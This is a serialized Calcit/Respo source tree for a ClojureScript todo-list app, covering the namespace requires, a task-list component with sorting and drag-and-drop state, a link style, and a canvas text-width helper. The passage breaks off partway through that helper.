|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJVx85q5kRSZ)
|j $ {} (:text |op-id) (:type :leaf) (:at 1518019981686) (:by |root) (:id |B14qSs_IM)
:type :expr
:at 1518019978110
:by |root
:id |SyzcSs_8G
|r $ {} (:text |new-task) (:type :leaf) (:at 1518019984448) (:by |root) (:id |ryGLcSjO8G)
:type :expr
:at 1500452996813
:by nil
:id |H1zl85q9JCrW
:type :expr
:at 1500452996813
:by nil
:id |By1lLq9qJ0BW
:type :expr
:at 1518019758856
:by |root
:id |B1eJiBjOUM
:type :expr
:at 1500452996813
:by nil
:id |rJPoHqc9J0r-
:proc $ {}
:data $ {}
:type :expr
:at 1500452996813
:by nil
:id |B1pbB999JAB-
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkpgB5ccyAB-)
|j $ {} (:text |app.updater) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyCxrqq5k0Hb)
|r $ {}
:data $ {}
|T $ {} (:text |:require) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1xWB595yRH-)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyGbBq5q10HZ)
|j $ {} (:text |app.schema) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk7WHq9cyCrZ)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJEZScqqyRSW)
|v $ {} (:text |schema) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJSbS99cJRSZ)
:type :expr
:at 1500452996813
:by nil
:id |rkZbH99q1ASb
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkPWHc9qk0rb)
|j $ {} (:text |respo.cursor) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Skd-BccqyCSZ)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1Y-r59qyCSb)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryjWH559k0HW)
|j $ {} (:text |update-states) (:type :leaf) (:at 1629051838121) (:by |Qr5ffqtY) (:id |r12bH9c9JCHZ)
:type :expr
:at 1500452996813
:by nil
:id |SJcWr95qkRS-
:type :expr
:at 1500452996813
:by nil
:id |B1LZB55c1Crb
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518019897878) (:by |root) (:id |H1g-SrjuIzleaf)
|j $ {} (:text |bisection-key.core) (:type :leaf) (:at 1518019905317) (:by |root) (:id |SygfSSsOUz)
|r $ {} (:text |:refer) (:type :leaf) (:at 1518019906110) (:by |root) (:id |ryQYHrouIM)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518019906603) (:by |root) (:id |rJScrHoOIf)
|j $ {} (:text |bisect) (:type :leaf) (:at 1518019907834) (:by |root) (:id |rJ-sHSjOLz)
|r $ {} (:text |max-id) (:type :leaf) (:at 1518019929927) (:by |root) (:id |rJxfwSsu8z)
|v $ {} (:text |min-id) (:type :leaf) (:at 1518020369805) (:by |root) (:id |H1tGDoOLf)
|x $ {} (:text |mid-id) (:type :leaf) (:at 1631341577720) (:by |Qr5ffqtY)
:type :expr
:at 1518019906418
:by |root
:id |SJIcrSod8f
:type :expr
:at 1518019896909
:by |root
:id |H1g-SrjuIz
:type :expr
:at 1500452996813
:by nil
:id |SJJbHccq1ABb
:type :expr
:at 1500452996813
:by nil
:id |B1ner99qJRHW
|app.comp.todolist $ {}
:defs $ {}
|comp-todolist $ {}
:data $ {}
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ3gx5ccJArZ)
|j $ {} (:text |comp-todolist) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1Tlx555yABb)
|r $ {}
:data $ {}
|T $ {} (:text |tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJJbecccJABb)
|j $ {} (:text |pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJxbx959yRrW)
|r $ {} (:text |dragging-id) (:type :leaf) (:at 1518169605614) (:by |root) (:id |BJWh-C1sIG)
|v $ {} (:text |dropping-id) (:type :leaf) (:at 1519749550140) (:by |root) (:id |SygLhYW7df)
:type :expr
:at 1500452996813
:by nil
:id |Sy0gg9c9JRSW
|v $ {}
:data $ {}
|T $ {} (:text |div) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1mWg599k0BW)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJB-xc9q10SW)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HyP-eq59yCrZ)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1M8g9c9kArb)
|v $ {}
:data $ {}
|T $ {} (:text |:position) (:type :leaf) (:at 1508042153843) (:by |root) (:id |HkJhSvlT-leaf)
|j $ {} (:text |:relative) (:type :leaf) (:at 1508042155356) (:by |root) (:id |SJ7zhBDga-)
:type :expr
:at 1508042150699
:by |root
:id |HkJhSvlT-
|x $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1518022111175) (:by |root) (:id |S1lLJRj_UMleaf)
|j $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1518022112549) (:by |root) (:id |BkHPk0ju8z)
|j $ {} (:text |40) (:type :leaf) (:at 1518022113585) (:by |root) (:id |ryetkCidLz)
|r $ {}
:data $ {}
|T $ {} (:text |count) (:type :leaf) (:at 1518022116040) (:by |root) (:id |Bklq1Ro_LM)
|j $ {} (:text |tasks) (:type :leaf) (:at 1518022117217) (:by |root) (:id |B1NnJAjOUG)
:type :expr
:at 1518022114350
:by |root
:id |By-cyAi_IM
:type :expr
:at 1518022111706
:by |root
:id |S1uJCsOLG
:type :expr
:at 1518022109966
:by |root
:id |S1lLJRj_UM
:type :expr
:at 1500452996813
:by nil
:id |HJx1AjuIM
:type :expr
:at 1500452996813
:by nil
:id |S18be5cqyRBb
:type :expr
:at 1500452996813
:by nil
:id |SyNWg5cqkAH-
|r $ {}
:data $ {}
|T $ {} (:text |div) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H19-xq9qyRSZ)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ2Zgc9cJRSW)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJAWl959kRH-)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1aUx5cqJCBZ)
|j $ {}
:data $ {}
|T $ {} (:text |:position) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1kPx999yCr-)
|j $ {} (:text |:relative) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rylvxq9q1AHZ)
:type :expr
:at 1500452996813
:by nil
:id |SyAUxc99yRSW
|r $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkHGecq91ArZ)
|j $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkPfx9q9J0Hb)
|j $ {}
:data $ {}
|T $ {} (:text |+) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1KMxcq51RHb)
|j $ {} (:text |8) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk5zxq9ck0Bb)
|r $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1hze9c5J0S-)
|j $ {} (:text |40) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SypMg99qJCH-)
|r $ {}
:data $ {}
|T $ {} (:text |count) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJJmg5q5kArb)
|j $ {} (:text |tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryeme9q5JABW)
:type :expr
:at 1500452996813
:by nil
:id |S1AGl5qcJASW
:type :expr
:at 1500452996813
:by nil
:id |BJjGl955JRBZ
:type :expr
:at 1500452996813
:by nil
:id |Bydfgq99yCrb
|r $ {} (:text ||px) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sy-Xl5ccJ0SZ)
:type :expr
:at 1500452996813
:by nil
:id |HkLzgcq5JCBb
:type :expr
:at 1500452996813
:by nil
:id |BJbDaRsd8G
:type :expr
:at 1500452996813
:by nil
:id |HkcpAsOIG
:type :expr
:at 1500452996813
:by nil
:id |S1a-g5qcyRHb
:type :expr
:at 1500452996813
:by nil
:id |Sys-xcqcyAHb
|r $ {}
:data $ {}
|5 $ {} (:text |list->) (:type :leaf) (:at 1509176536853) (:by |root) (:id |HJe1krhWAb)
|L $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1508042295408) (:by |root) (:id |S1xyrLvgpW)
:type :expr
:at 1508042295066
:by |root
:id |SkZ1rUDe6W
|T $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1629051716784) (:by |Qr5ffqtY) (:id |B15Qx5qcJ0HW)
|j $ {} (:text |tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByoXe5qck0SW)
|l $ {}
:data $ {}
|T $ {} (:text |.to-list) (:type :leaf) (:at 1629052108649) (:by |Qr5ffqtY)
:type :expr
:at 1629052107509
:by |Qr5ffqtY
|n $ {}
:data $ {}
|T $ {} (:text |.sort-by) (:type :leaf) (:at 1629051718649) (:by |Qr5ffqtY) (:id |S1ebrDjdUfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1518020413564) (:by |root) (:id |ry-VHDsuIG)
|j $ {}
:data $ {}
|T $ {} (:text |pair) (:type :leaf) (:at 1629051730814) (:by |Qr5ffqtY)
:type :expr
:at 1518020413908
:by |root
:id |BJWISviOLz
|r $ {}
:data $ {}
|D $ {} (:text |let[]) (:type :leaf) (:at 1629051723171) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|j $ {} (:text |task-id) (:type :leaf) (:at 1629051725679) (:by |Qr5ffqtY)
|r $ {} (:text |task) (:type :leaf) (:at 1629051725679) (:by |Qr5ffqtY)
:type :expr
:at 1629051725679
:by |Qr5ffqtY
|P $ {} (:text |pair) (:type :leaf) (:at 1629051728115) (:by |Qr5ffqtY)
|T $ {}
:data $ {}
|T $ {} (:text |:sort-id) (:type :leaf) (:at 1518020424119) (:by |root) (:id |BJeCBvjdUMleaf)
|j $ {} (:text |task) (:type :leaf) (:at 1518020424710) (:by |root) (:id |BkVxIDoOLz)
:type :expr
:at 1518020422133
:by |root
:id |BJeCBvjdUM
:type :expr
:at 1629051720272
:by |Qr5ffqtY
:type :expr
:at 1518020412129
:by |root
:id |SkzNBPo_UG
:type :expr
:at 1518020409376
:by |root
:id |S1ebrDjdUf
|r $ {}
:data $ {}
|T $ {} (:text |map-indexed) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJTXlcqckAHb)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By1Vxc5q1Rrb)
|j $ {}
:data $ {}
|T $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1bVl59c10H-)
|j $ {} (:text |pair) (:type :leaf) (:at 1629051564600) (:by |Qr5ffqtY)
:type :expr
:at 1500452996813
:by nil
:id |B1eEecq9yRrb
|r $ {}
:data $ {}
|D $ {} (:text |let[]) (:type :leaf) (:at 1629051567128) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|j $ {} (:text |task-id) (:type :leaf) (:at 1629051568123) (:by |Qr5ffqtY)
|r $ {} (:text |task) (:type :leaf) (:at 1629051568123) (:by |Qr5ffqtY)
:type :expr
:at 1629051568123
:by |Qr5ffqtY
|P $ {} (:text |pair) (:type :leaf) (:at 1629051569920) (:by |Qr5ffqtY)
|T $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByENxc9cyCrW)
|f $ {} (:text |task-id) (:type :leaf) (:at 1518019520378) (:by |root) (:id |H1-_TQou8f)
|r $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SytNxc551ABb)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |pointed?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ34xcc5JASZ)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H10VxqcqJRSZ)
|j $ {} (:text |pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJkBl5c5yASZ)
|r $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1eBl99qkAHb)
:type :expr
:at 1500452996813
:by nil
:id |ry6Ne99c1AH-
:type :expr
:at 1500452996813
:by nil
:id |SJsVeq99k0rZ
:type :expr
:at 1500452996813
:by nil
:id |HkcNg9c5JAHZ
|r $ {}
:data $ {}
|T $ {} (:text |comp-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJMSg9cc10rW)
|j $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry7Bxc5qk0B-)
|r $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkVBl9q9yCrW)
|v $ {} (:text |pointed?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BySSgc9c1CH-)
|x $ {} (:text |dragging-id) (:type :leaf) (:at 1518620614547) (:by |root) (:id |BJx0Ty0WPM)
|y $ {} (:text |dropping-id) (:type :leaf) (:at 1519749547770) (:by |root) (:id |Hy-xhKWQdM)
:type :expr
:at 1500452996813
:by nil
:id |B1WBlcqcJArb
:type :expr
:at 1500452996813
:by nil
:id |BkuNecq51AHb
:type :expr
:at 1500452996813
:by nil
:id |ByXVx5cckRBb
:type :expr
:at 1629051560686
:by |Qr5ffqtY
:type :expr
:at 1500452996813
:by nil
:id |SJ0Xgc9510S-
:type :expr
:at 1500452996813
:by nil
:id |HJ2Qgc95kRr-
|v $ {}
:data $ {}
|T $ {} (:text |.sort-by) (:type :leaf) (:at 1629052105014) (:by |Qr5ffqtY) (:id |ry2re9cqJCSW)
|j $ {} (:text |first) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1pBxqccJRHW)
:type :expr
:at 1500452996813
:by nil
:id |r1jBlc9c1ABZ
:type :expr
:at 1500452996813
:by nil
:id |HJYQl555y0SZ
:type :expr
:at 1508042293789
:by |root
:id |BJxANIveaW
|v $ {}
:data $ {}
|T $ {} (:text |div) (:type :leaf) (:at 1508042142510) (:by |root) (:id |S1Vsrve6Wleaf)
|j $ {}
:data $ {}
|D $ {} (:text |{}) (:type :leaf) (:at 1508042185292) (:by |root) (:id |SJZyRrveTW)
|b $ {}
:data $ {}
|D $ {} (:text |:style) (:type :leaf) (:at 1508042188737) (:by |root) (:id |rJgVABDxpW)
|T $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |:position) (:type :leaf) (:at 1508042340052) (:by |root) (:id |BkKPIPlp-leaf)
|j $ {} (:text |:absolute) (:type :leaf) (:at 1508042342567) (:by |root) (:id |HkZnD8Dl6-)
:type :expr
:at 1508042336554
:by |root
:id |BkKPIPlp-
|yj $ {}
:data $ {}
|T $ {} (:text |:transition) (:type :leaf) (:at 1508042370951) (:by |root) (:id |rJxuYIDepZleaf)
|j $ {} (:text ||600ms) (:type :leaf) (:at 1508042701382) (:by |root) (:id |SyVjKIPxpb)
:type :expr
:at 1508042368513
:by |root
:id |rJxuYIDepZ
|T $ {} (:text |{}) (:type :leaf) (:at 1508042143168) (:by |root) (:id |rJDjSweaW)
|j $ {}
:data $ {}
|T $ {} (:text |:top) (:type :leaf) (:at 1508042159207) (:by |root) (:id |ByOjBDlpb)
|j $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1508042160330) (:by |root) (:id |H1fPhSweaW)
|j $ {}
:data $ {}
|D $ {} (:text |+) (:type :leaf) (:at 1508042353688) (:by |root) (:id |rkZFOIwxaZ)
|L $ {} (:text |8) (:type :leaf) (:at 1518169443184) (:by |root) (:id |rJe9d8wx6W)
|T $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1508042162326) (:by |root) (:id |Hkmd2Hwlab)
|j $ {} (:text |48) (:type :leaf) (:at 1518169302347) (:by |root) (:id |SJihSwlT-)
|r $ {} (:text |pointer) (:type :leaf) (:at 1508042213831) (:by |root) (:id |S1l62HwepZ)
:type :expr
:at 1508042161180
:by |root
:id |H1t2SPepZ
:type :expr
:at 1508042352833
:by |root
:id |H1gKO8veTW
|r $ {} (:text ||px) (:type :leaf) (:at 1508042171257) (:by |root) (:id |B1WzTrvg6W)
:type :expr
:at 1508042159680
:by |root
:id |S1_nHveTZ
:type :expr
:at 1508042143834
:by |root
:id |rJe_iSwxaZ
|r $ {}
:data $ {}
|T $ {} (:text |:left) (:type :leaf) (:at 1508042175800) (:by |root) (:id |HkeHaSwgT-leaf)
|j $ {} (:text |-20) (:type :leaf) (:at 1508042532165) (:by |root) (:id |rkx_6SDg6-)
:type :expr
:at 1508042173353
:by |root
:id |HkeHaSwgT-
|v $ {}
:data $ {}
|T $ {} (:text |:width) (:type :leaf) (:at 1508042194015) (:by |root) (:id |BJ_0SwxTZleaf)
|j $ {} (:text |6) (:type :leaf) (:at 1514170265474) (:by |root) (:id |Skl5AHvgpZ)
:type :expr
:at 1508042191528
:by |root
:id |BJ_0SwxTZ
|x $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1508042197580) (:by |root) (:id |Bk6RHwlpbleaf)
|j $ {} (:text |32) (:type :leaf) (:at 1518169438183) (:by |root) (:id |rkxACrDgT-)
:type :expr
:at 1508042196596
:by |root
:id |Bk6RHwlpb
|y $ {}
:data $ {}
|T $ {} (:text |:background-color) (:type :leaf) (:at 1508042202789) (:by |root) (:id |H1lJJUvlaWleaf)
|j $ {}
:data $ {}
|T $ {} (:text |hsl) (:type :leaf) (:at 1514170251881) (:by |root) (:id |ByZmkLDepb)
|j $ {} (:text |0) (:type :leaf) (:at 1514170252262) (:by |root) (:id |ryGN5DyAMf)
|r $ {} (:text |90) (:type :leaf) (:at 1514170254674) (:by |root) (:id |rkENcvy0Mz)
|v $ {} (:text |80) (:type :leaf) (:at 1514170275525) (:by |root) (:id |rybD9P10MM)
:type :expr
:at 1514170251458
:by |root
:id |SJmQ5DyRMz
:type :expr
:at 1508042198811
:by |root
:id |H1lJJUvlaW
:type :expr
:at 1508042142730
:by |root
:id |SkgPiHDgTb
:type :expr
:at 1508042187583
:by |root
:id |Hk0Q8wlTZ
:type :expr
:at 1508042182944
:by |root
:id |H1gJCSDe6-
:type :expr
:at 1508042139945
:by |root
:id |ByNBUDea-
:type :expr
:at 1500452996813
:by nil
:id |r1KZxqq5J0HW
:type :expr
:at 1500452996813
:by nil
:id |BkMWx5cqJCrb
:type :expr
:at 1500452996813
:by nil
:id |rkoxxqc5kRS-
:proc $ {}
:data $ {}
:type :expr
:at 1500452996813
:by nil
:id |Hy5le559y0HW
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJR2q95kABW)
|j $ {} (:text |app.comp.todolist) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hykaqc91AHb)
|v $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1B09q9kAHW)
|j $ {} (:text |app.comp.task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkL0q55yCBb)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1DC55cJRrW)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HktR9q5J0HW)
|j $ {} (:text |comp-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hy9C5cqkCHW)
:type :expr
:at 1500452996813
:by nil
:id |rydA55ckRSZ
:type :expr
:at 1500452996813
:by nil
:id |rk4A59cJ0H-
|yj $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1Zxeq59yCH-)
|j $ {} (:text |clojure.string) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bkfleqc9kCHZ)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJXge5q5y0rW)
|v $ {} (:text |string) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJVel5q9kCHZ)
:type :expr
:at 1500452996813
:by nil
:id |rJgxgq95kAr-
|T $ {} (:text |:require) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sy3a5cqJRSb)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkhC9cqkRHW)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1629051739222) (:by |Qr5ffqtY)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryCCc591RBb)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rygyx99qy0Sb)
|j $ {} (:text |hsl) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkbJlq9q1RrZ)
:type :expr
:at 1500452996813
:by nil
:id |r1Jyeqc9J0rZ
:type :expr
:at 1500452996813
:by nil
:id |S1s0q5qkAB-
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bk8gl5c5JCr-)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1518014663987) (:by |root) (:id |r1Dexc55k0BW)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1Oll9qqyAHZ)
|v $ {} (:text |ui) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJtgg595JCBW)
:type :expr
:at 1500452996813
:by nil
:id |BkBllqcqJ0S-
|v $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454597345) (:by |root) (:id |S1qpq5q1ArW)
|T $ {} (:text |respo.core) (:type :leaf) (:at 1553789402728) (:by |root) (:id |B1QT9991AS-)
|j $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1N699q1Cr-)
|r $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454599618) (:by |root) (:id |B1vaq5qJArb)
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJ8Tqqq1ArW)
|j $ {} (:text |div) (:type :leaf) (:at 1500454601236) (:by |root) (:id |B1_p9qc1CrW)
|r $ {} (:text |button) (:type :leaf) (:at 1500454602059) (:by |root) (:id |S1Ka9qqkCHb)
|v $ {} (:text |list->) (:type :leaf) (:at 1509176551611) (:by |root) (:id |BJlRyr2-A-)
:type :expr
:at 1500452996813
:by nil
:id |HkS6qq5y0B-
:type :expr
:at 1500452996813
:by nil
:id |Hk3kSh-CZ
|x $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkXygc55y0r-)
|j $ {} (:text |respo.comp.space) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyVJlqq910S-)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1B1e9991CHW)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SywJx95cyRrZ)
|j $ {} (:text |=<) (:type :leaf) (:at 1508038838277) (:by |root) (:id |rydyeqc5k0SZ)
:type :expr
:at 1500452996813
:by nil
:id |rJLJg5q9JCS-
:type :expr
:at 1500452996813
:by nil
:id |H1f1l9ccyCSW
:type :expr
:at 1500452996813
:by nil
:id |r1jTq5910SZ
:type :expr
:at 1500452996813
:by nil
:id |Syp2555y0S-
|app.style $ {}
:defs $ {}
|link $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1525626795440) (:by |root) (:id |SJWb2D22pz)
|j $ {} (:text |link) (:type :leaf) (:at 1525626793414) (:by |root) (:id |B1M-nP33Tz)
|r $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1525626796852) (:by |root) (:id |H1bEnDnn6z)
|j $ {} (:text |ui/link) (:type :leaf) (:at 1525626798148) (:by |root) (:id |ByMH3w32aG)
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525626864864) (:by |root) (:id |SJOxu2npz)
|j $ {}
:data $ {}
|T $ {} (:text |:margin) (:type :leaf) (:at 1525626866414) (:by |root) (:id |BkMFe_nh6f)
|j $ {} (:text "|\"0 8px") (:type :leaf) (:at 1525626876110) (:by |root) (:id |rJsxu236M)
:type :expr
:at 1525626865129
:by |root
:id |rkQYx_23aG
:type :expr
:at 1525626864572
:by |root
:id |SyFeunhaG
:type :expr
:at 1525626793414
:by |root
:id |H1Xbhw2h6f
:type :expr
:at 1525626793414
:by |root
:id |Bklb3Pnh6M
:proc $ {}
:data $ {}
:type :expr
:at 1525626791002
:by |root
:id |Bymy3P226G
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1525626791002) (:by |root) (:id |B1Zkhw33TM)
|j $ {} (:text |app.style) (:type :leaf) (:at 1525626791002) (:by |root) (:id |ryf1hvn2af)
|r $ {}
:data $ {}
|T $ {} (:text |:require) (:type :leaf) (:at 1525626800476) (:by |root) (:id |rJxO3P23TG)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1525626800906) (:by |root) (:id |S1Khwn2pz)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1525626803778) (:by |root) (:id |SkQY3Pnn6G)
|r $ {} (:text |:as) (:type :leaf) (:at 1525626806821) (:by |root) (:id |HJGh2Dh26G)
|v $ {} (:text |ui) (:type :leaf) (:at 1525626807248) (:by |root) (:id |r1MyavhhaG)
:type :expr
:at 1525626800729
:by |root
:id |H1lt3v2h6f
:type :expr
:at 1525626799833
:by |root
:id |ByZ_2P32pM
:type :expr
:at 1525626791002
:by |root
:id |BJlJhP2n6G
|app.util.dom $ {}
:defs $ {}
|get-width $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1519745498624) (:by |root) (:id |r1ZX1qxXuM)
|j $ {} (:text |get-width) (:type :leaf) (:at 1519745498624) (:by |root) (:id |BJfX1cl7OM)
|r $ {}
:data $ {}
|T $ {} (:text |text) (:type :leaf) (:at 1519745502833) (:by |root) (:id |SJzrk9xmdz)
|j $ {} (:text |font-family) (:type :leaf) (:at 1519745643689) (:by |root) (:id |r1nPqe7uM)
|r $ {} (:text |font-size) (:type :leaf) (:at 1519745647915) (:by |root) (:id |SklN_9lmOM)
:type :expr
:at 1519745498624
:by |root
:id |BkXQkclXOf
|v $ {}
:data $ {}
|D $ {} (:text |if) (:type :leaf) (:at 1519749816313) (:by |root) (:id |SkgxTcbQ_f)
|L $ {}
:data $ {}
|T $ {} (:text |exists?) (:type :leaf) (:at 1519749819452) (:by |root) (:id |HJmepq-X_z)
|j $ {} (:text |js/document) (:type :leaf) (:at 1519749822448) (:by |root) (:id |BkEp5W7Of)
:type :expr
:at 1519749816625
:by |root
:id |S1-acZX_z
|T $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1519745568174) (:by |root) (:id |rkxPQ9e7uzleaf)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |ctx) (:type :leaf) (:at 1519745570598) (:by |root) (:id |SyMuXce7Of)
|j $ {}
:data $ {}
|T $ {} (:text |.!getContext) (:type :leaf) (:at 1629052407294) (:by |Qr5ffqtY) (:id |rkxim9em_G)
|j $ {} (:text |@*canvas-element) (:type :leaf) (:at 1629052404838) (:by |Qr5ffqtY) (:id |ryR7cgmOf)
|r $ {} (:text ||2d) (:type :leaf) (:at 1519745598357) (:by |root) (:id |Hyrrcg7OM)
:type :expr
:at 1519745570954
:by |root
:id |S1Wimcl7Of
:type :expr
:at 1519745568562
:by |root
:id |Sytm9l7_G
:type :expr
:at 1519745568421
:by |root
:id |HkQum5l7uf
|n $ {}
:data $ {}
|T $ {} (:text |set!) (:type :leaf) (:at 1519746070138) (:by |root) (:id |rJxOh9gX_zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |.-font) (:type :leaf) (:at 1519745718231) (:by |root) (:id |HkeshcxQdf)
|j $ {} (:text |ctx) (:type :leaf) (:at 1519745720532) (:by |root) (:id |HJ1a9lQ_M)
:type :expr
:at 1519745716644
:by |root
:id |Sy6h5g7dz
|r $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1519745723967) (:by |root) (:id |HJlMT9xQ_M)
|j $ {} (:text |font-size) (:type :leaf) (:at 1519745730428) (:by |root) (:id |rkzE65gQOM)
|r $ {} (:text "||px ") (:type :leaf) (:at 1519745733099) (:by |root) (:id |rJ3pcgQOf)
|v $ {} (:text |font-family) (:type :leaf) (:at 1519745737272) (:by |root) (:id |Sy06cgQOf)
:type :expr
:at 1519745723304
:by |root
:id |r1maqgQdf
:type :expr
:at 1519745712176
:by |root
:id |rJxOh9gX_z
|r $ {}
:data $ {}
|T $ {} (:text |.-width) (:type :leaf) (:at 1519745629781) (:by |root) (:id |SJzXDqe7uMleaf)
|j $ {}
